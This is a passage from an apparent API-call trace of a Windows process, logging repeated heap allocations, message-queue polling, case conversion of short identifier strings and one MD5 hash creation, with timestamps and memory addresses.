(in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0188.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0188.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0188.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0188.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0188.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.150] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0188.150] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.150] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0188.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0188.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0188.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0188.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.150] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.150] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0188.150] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0188.151] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0188.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0188.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0188.151] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0188.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0188.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0188.151] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0188.151] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0188.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0188.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0188.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0188.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0188.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0188.152] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0188.152] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.152] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0188.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0188.152] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0188.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0188.152] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0188.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0188.153] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0188.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0188.153] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0188.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0188.153] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0188.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0188.153] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0188.154] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0188.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0188.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0188.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0188.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0188.154] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0188.154] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.154] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0188.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0188.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0188.155] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0188.155] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0188.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0188.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0188.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0188.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0188.155] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0188.155] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.155] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0188.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0188.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0188.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0188.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0188.156] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.156] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0188.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0188.156] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0188.156] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0188.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0188.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0188.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0188.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0188.157] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0188.157] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.157] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0188.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0188.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0188.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0188.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0188.157] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.157] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0188.157] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0188.158] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0188.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0188.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0188.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0188.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0188.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0188.158] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.158] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0188.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0188.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0188.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0188.159] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.159] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.159] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0188.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0188.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0188.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0188.159] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0188.159] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0188.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0188.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0188.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0188.160] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0188.160] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.160] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0188.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0188.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0188.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0188.161] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0188.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0188.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0070 [0188.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0188.161] CryptCreateHash (in: hProv=0xa9ffb0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0188.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0188.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0188.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0188.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0188.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0188.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0188.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0188.162] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0188.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0188.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0188.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0188.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0188.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0090 [0188.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0188.162] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.162] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0188.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0188.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0188.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0188.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0188.163] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0188.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0188.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0188.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0188.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0188.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0188.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0188.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0188.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0188.164] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0188.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0188.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0188.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0188.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0188.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0090 [0188.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0188.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0188.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0188.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0188.164] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0188.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0188.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0188.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0188.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0188.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0188.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0188.165] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0188.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0188.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0188.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0188.165] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.165] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0188.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0188.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0188.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0188.166] RtlAllocateHeap 